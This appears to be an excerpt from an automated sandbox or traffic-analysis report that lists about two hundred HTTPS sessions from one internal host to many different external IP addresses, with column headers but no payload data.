                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20950192.168.2.143837640.148.123.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20951192.168.2.14589864.165.154.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20952192.168.2.146011476.178.61.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20953192.168.2.1440488125.241.100.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20954192.168.2.144708678.240.8.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20955192.168.2.1456736180.173.44.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20956192.168.2.145619662.18.243.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20957192.168.2.1446138218.23.219.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20958192.168.2.1459516194.212.145.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20959192.168.2.144092044.42.81.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20960192.168.2.144800460.147.84.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20961192.168.2.1450130169.157.88.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20962192.168.2.1447250123.161.225.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20963192.168.2.144701665.235.133.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20964192.168.2.145076085.12.81.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20965192.168.2.1450560122.19.64.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20966192.168.2.144673658.22.251.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20967192.168.2.1437860207.19.253.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20968192.168.2.1437992107.228.79.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20969192.168.2.1441514177.31.93.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20970192.168.2.144510883.93.223.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20971192.168.2.1450118100.144.232.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20972192.168.2.1455162113.91.210.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20973192.168.2.144552650.195.205.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20974192.168.2.1456922170.147.18.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20975192.168.2.1441632159.171.126.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20976192.168.2.1439402142.81.15.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20977192.168.2.1443202171.85.40.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20978192.168.2.144558254.48.11.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20979192.168.2.143868436.126.32.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20980192.168.2.1450280152.130.212.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20981192.168.2.144742234.169.198.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20982192.168.2.1444084118.72.232.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20983192.168.2.1448964202.23.104.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20984192.168.2.144409873.129.161.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20985192.168.2.144808277.203.225.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20986192.168.2.145454495.92.124.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20987192.168.2.144051652.132.35.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20988192.168.2.1456854133.105.0.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20989192.168.2.146057699.177.244.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20990192.168.2.1453838210.138.235.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20991192.168.2.1435836123.58.246.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20992192.168.2.1443128114.155.112.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20993192.168.2.1441076152.252.92.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20994192.168.2.145846034.109.75.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20995192.168.2.1460902154.117.134.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20996192.168.2.14348209.131.122.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20997192.168.2.144937259.5.229.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20998192.168.2.1442024124.46.128.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20999192.168.2.1455374181.88.99.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21000192.168.2.1443208184.26.100.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21001192.168.2.14469208.217.114.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21002192.168.2.146083084.168.49.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21003192.168.2.1448704110.218.201.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21004192.168.2.145087097.36.187.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21005192.168.2.145331219.73.36.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21006192.168.2.145683652.205.249.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21007192.168.2.14461269.178.111.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21008192.168.2.143972051.203.149.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21009192.168.2.1437184206.46.3.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21010192.168.2.1448524191.240.216.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21011192.168.2.1452964166.134.228.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21012192.168.2.1433176180.169.243.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21013192.168.2.1436082145.15.106.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21014192.168.2.145952220.154.166.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21015192.168.2.1450598210.82.7.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21016192.168.2.1458330200.73.159.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21017192.168.2.1449882166.14.200.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21018192.168.2.1436290162.221.183.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21019192.168.2.1450352169.11.240.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21020192.168.2.1454858221.74.171.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21021192.168.2.14387589.231.48.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21022192.168.2.143312252.239.216.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21023192.168.2.1452132205.102.117.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21024192.168.2.144782693.179.138.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21025192.168.2.1432986143.225.205.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21026192.168.2.1433956130.187.141.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21027192.168.2.1442618156.173.211.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21028192.168.2.145008661.220.48.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21029192.168.2.144112044.196.72.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21030192.168.2.1456002118.170.239.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21031192.168.2.144997867.184.177.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21032192.168.2.145597694.145.248.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21033192.168.2.144509831.118.208.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21034192.168.2.144811445.73.61.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21035192.168.2.144157697.218.151.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21036192.168.2.145337434.198.93.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21037192.168.2.14383509.115.78.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21038192.168.2.1452622209.184.149.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21039192.168.2.14476048.123.158.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21040192.168.2.1434370205.208.173.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21041192.168.2.1435292138.146.201.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21042192.168.2.144464646.148.220.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21043192.168.2.1435026140.234.1.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21044192.168.2.1458740204.43.66.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21045192.168.2.145358854.138.72.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21046192.168.2.145765217.40.248.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21047192.168.2.1452764213.209.28.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21048192.168.2.144957080.204.77.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21049192.168.2.1452988180.69.163.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21050192.168.2.1452832154.155.217.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21051192.168.2.145255857.0.225.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21052192.168.2.14381664.96.166.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21053192.168.2.1444340186.34.39.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21054192.168.2.145160846.253.211.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21055192.168.2.145485447.226.95.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21056192.168.2.145477476.203.177.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21057192.168.2.146044257.178.45.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21058192.168.2.1452142156.194.244.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21059192.168.2.1452782178.154.244.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21060192.168.2.143669689.144.232.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21061192.168.2.1455582176.15.7.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21062192.168.2.1445930156.121.190.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21063192.168.2.1435690164.67.33.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21064192.168.2.1449932136.113.18.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21065192.168.2.146057681.136.133.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21066192.168.2.145371860.94.82.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21067192.168.2.1437878223.66.238.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21068192.168.2.1441824187.61.72.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21069192.168.2.1455224144.14.88.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21070192.168.2.144912696.32.26.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21071192.168.2.1444452223.214.87.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21072192.168.2.1460138170.53.229.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21073192.168.2.1460516206.218.46.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21074192.168.2.145281284.19.103.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21075192.168.2.1457604110.161.147.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21076192.168.2.144707054.168.121.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21077192.168.2.1448996211.205.150.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21078192.168.2.1437426208.233.172.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21079192.168.2.1435682201.75.21.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21080192.168.2.145299625.66.129.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21081192.168.2.145683475.42.71.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21082192.168.2.1444566124.14.228.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21083192.168.2.145488674.19.224.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21084192.168.2.144506866.25.196.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21085192.168.2.1439958218.67.137.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21086192.168.2.1439406161.133.141.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21087192.168.2.1433890147.123.126.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21088192.168.2.1456052146.117.79.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21089192.168.2.146074054.48.223.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21090192.168.2.1460082130.2.70.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21091192.168.2.143503899.245.147.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21092192.168.2.1456172105.162.38.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21093192.168.2.1445554110.235.83.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21094192.168.2.144586483.8.27.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21095192.168.2.1437194122.122.204.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21096192.168.2.1443928105.107.5.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21097192.168.2.1441724133.199.101.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21098192.168.2.145635838.128.248.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21099192.168.2.1432790139.254.144.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21100192.168.2.144213052.222.206.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21101192.168.2.143915662.84.136.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21102192.168.2.1446538130.128.221.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21103192.168.2.1433654217.139.230.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21104192.168.2.144648291.70.253.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21105192.168.2.1460966196.177.130.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21106192.168.2.144975282.12.34.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21107192.168.2.1460144211.186.226.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21108192.168.2.145833831.152.167.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21109192.168.2.1441148152.136.204.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21110192.168.2.1444886151.101.105.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21111192.168.2.145908095.111.80.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21112192.168.2.1434724194.100.154.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21113192.168.2.1433364213.112.177.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21114192.168.2.144975438.218.239.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21115192.168.2.1455540161.35.36.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21116192.168.2.1442218196.205.159.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21117192.168.2.1446372168.99.135.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21118192.168.2.145619286.233.64.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21119192.168.2.1450194132.195.11.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21120192.168.2.1437026221.40.44.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21121192.168.2.145818032.214.167.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21122192.168.2.145471836.88.126.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21123192.168.2.143338646.204.249.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21124192.168.2.1454926211.211.88.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21125192.168.2.1447930123.189.252.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21126192.168.2.144184868.75.54.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21127192.168.2.143621412.27.206.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21128192.168.2.145753290.178.220.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21129192.168.2.1453678201.78.38.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21130192.168.2.1435946101.124.81.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21131192.168.2.1444906192.172.196.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21132192.168.2.1444768197.106.231.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21133192.168.2.1446262174.65.16.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21134192.168.2.1438934218.166.208.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21135192.168.2.1452956222.25.115.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21136192.168.2.1457102145.231.162.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21137192.168.2.143692454.137.87.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21138192.168.2.145394281.98.96.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21139192.168.2.143996057.146.220.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21140192.168.2.144937814.149.107.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21141192.168.2.1443790134.71.85.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21142192.168.2.1433510219.128.42.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21143192.168.2.1444256210.114.228.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21144192.168.2.1455304196.86.42.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21145192.168.2.1459252209.232.68.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21146192.168.2.143421212.189.19.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21147192.168.2.145373678.16.43.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21148192.168.2.143466668.243.103.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21149192.168.2.1434338122.38.161.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21150192.168.2.1440318158.22.82.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21151192.168.2.143296896.29.183.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21152192.168.2.1450626207.114.84.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21153192.168.2.1452268171.105.23.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21154192.168.2.145496424.163.218.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21155192.168.2.1435250120.240.95.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21156192.168.2.1439892218.48.112.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21157192.168.2.1443588205.123.229.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21158192.168.2.14506821.229.54.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21159192.168.2.1444336143.19.172.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21160192.168.2.1450322100.222.252.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21161192.168.2.1460892160.138.173.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
